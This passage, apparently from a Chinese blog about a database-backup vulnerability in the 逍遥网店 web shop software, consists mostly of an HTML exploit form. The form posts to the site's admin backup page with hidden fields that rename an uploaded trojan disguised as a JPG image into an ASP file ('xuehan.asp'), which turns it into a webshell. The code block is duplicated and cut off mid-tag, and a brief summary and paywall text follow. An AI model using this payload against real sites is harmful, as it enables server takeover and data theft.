程序代码
<script language=javascript src=http://www.99**.com/include/mouse_on_title.js></script>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="manage.css" type="text/css">
</head>
<BODY background="../images/admin/back.gif">
<table width="98%" border="1" style="border-collapse: collapse; border-style: dotted; border-width: 0px"
bordercolor="#333333" cellspacing="0" cellpadding="2">
<form action=http://www.99**.com/admin/safe5.asp method=post name=backup>
<tr class=backs><td colspan=2 class=td height=18>数据库在线维护</td></tr>
<input type="hidden" name="oldpath" value="../pic/digi/0063.jpg"><!--木马改图片上传后的路径-->
<input type="hidden" name="DBname" size="20" value="xuehan.asp"><!--要备份的木马路径-->
<tr><td colspan=2 heigh=50
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="manage.css" type="text/css">
</head>
<BODY background="../images/admin/back.gif">
<table width="98%" border="1" style="border-collapse: collapse; border-style: dotted; border-width: 0px"
bordercolor="#333333" cellspacing="0" cellpadding="2">
<form action=http://www.99**.com/admin/safe5.asp method=post name=backup>
<tr class=backs><td colspan=2 class=td height=18>数据库在线维护</td></tr>
<input type="hidden" name="oldpath" value="../pic/digi/0063.jpg"><!--木马改图片上传后的路径-->
<input type="hidden" name="DBname" size="20" value="xuehan.asp"><!--要备份的木马路径-->
<tr><td colspan=2 heigh=50

该博客揭示了逍遥网店存在一个数据备份漏洞,通过特定的JavaScript代码,攻击者可以执行数据库备份、压缩、恢复、删除和下载等操作。用户在确认警告消息后,可以执行这些敏感操作,这可能对服务器稳定性和数据安全性构成威胁。
最低0.47元/天 解锁文章
1767





